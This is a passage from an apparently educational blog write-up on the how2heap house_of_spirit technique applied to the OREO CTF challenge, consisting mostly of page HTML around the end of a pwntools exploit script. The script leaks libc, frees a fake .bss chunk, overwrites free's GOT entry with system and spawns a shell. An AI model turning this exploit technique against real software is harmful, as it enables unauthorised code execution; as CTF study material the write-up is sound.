class="number">0x23</span>)</span><br><span class="line">	show_added_rifles()</span><br><span class="line">	p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">	<span class="keyword">global</span> libc_base</span><br><span class="line">	libc_base=my_u32(p.recv(<span class="number">4</span>))<span class="number">-0x49670</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Cycle to fakesize=0x3f</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0x3f</span>):</span><br><span class="line">	add(<span class="string">'name'</span>,<span class="string">'description'</span>)</span><br><span class="line">order()</span><br><span class="line"></span><br><span class="line">leave_message(<span class="string">'\x00'</span>*<span class="number">36</span>+p32(<span class="number">0x41</span>))<span class="comment">#Set fake next chunk size</span></span><br><span class="line"></span><br><span class="line">add(<span class="string">'a'</span>*<span class="number">27</span>+p32(<span class="number">0x0804A2A8</span>),<span class="string">'b'</span>*<span class="number">0x23</span>)</span><br><span class="line">order()<span class="comment">#Free our bss memory out</span></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'free out'</span> + <span class="string">"\033[0m"</span>)</span><br><span class="line">add(<span class="string">'name'</span>,p32(free_GOT))<span class="comment">#Set notice_ptr to free_GOT</span></span><br><span class="line"></span><br><span class="line">leaklibc()<span class="comment">#Now leak libc</span></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'libc_base:'</span>+hex(libc_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line">leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))<span class="comment">#Set free_GOT to system</span></span><br><span class="line">add(<span class="string">'/bin/sh'</span>,<span class="string">'/bin/sh'</span>)<span class="comment">#Set /bin/sh for system (linked list head)</span></span><br><span class="line">order()<span class="comment">#free(head_ptr)=system(binsh_ptr)</span></span><br><span class="line"><span class="comment">#getshell</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/" rel="prev" title="how2heap-unsafe-unlink-stkof、Wheel-of-Robots">
      <i class="fa fa-chevron-left"></i> how2heap-unsafe-unlink-stkof、Wheel-of-Robots
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/10/how2heap-poison-null-byte-plaiddb/" rel="next" title="how2heap - poison_null_byte&plaiddb">
      how2heap - poison_null_byte&plaiddb <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#how2heap-house-of-spirit-amp-OREO"><span class="nav-number">1.</span> <span class="nav-text">how2heap - house_of_spirit&amp;OREO</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#house-of-spirit-c"><span class="nav-number">2.</span> <span class="nav-text">house_of_spirit.c</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Debug"><span class="nav-number">2.1.</span> <span class="nav-text">Debug</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#OREO"><span class="nav-number">3.</span> <span class="nav-text">OREO</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析"><span class="nav-number">3.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#main函数："><span class="nav-number">3.1.1.</span> <span class="nav-text">main函数：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#menu"><span class="nav-number">3.1.2.</span> <span class="nav-text">menu</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lt-Rifile-structure-gt"><span class="nav-number">3.1.3.</span> <span class="nav-text">&lt;Rifile structure&gt;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#add"><span class="nav-number">3.1.4.</span> <span class="nav-text">add</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Show-added-rifles"><span class="nav-number">3.1.5.</span> <span class="nav-text">Show added rifles</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#order"><span class="nav-number">3.1.6.</span> <span class="nav-text">order</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#leave-message"><span class="nav-number">3.1.7.</span> <span class="nav-text">leave_message</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#show-stats"><span class="nav-number">3.1.8.</span> <span class="nav-text">show_stats</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit"><span class="nav-number">3.2.</span> <span class="nav-text">Exploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#leak："><span class="nav-number">3.2.1.</span> <span class="nav-text">leak：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Arbitrary-write："><span class="nav-number">3.2.2.</span> <span class="nav-text">Arbitrary write：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#实现"><span class="nav-number">3.2.3.</span> <span class="nav-text">实现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#leaklibc"><span class="nav-number">3.2.3.1.</span> <span class="nav-text">leaklibc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#free-target-chunk"><span class="nav-number">3.2.3.2.</span> <span class="nav-text">free target chunk</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#set-GOT"><span class="nav-number">3.2.3.3.</span> <span class="nav-text">set GOT</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#getshell"><span class="nav-number">3.2.3.4.</span> <span class="nav-text">getshell</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整exp"><span class="nav-number">3.3.</span> <span class="nav-text">完整exp</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.0
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
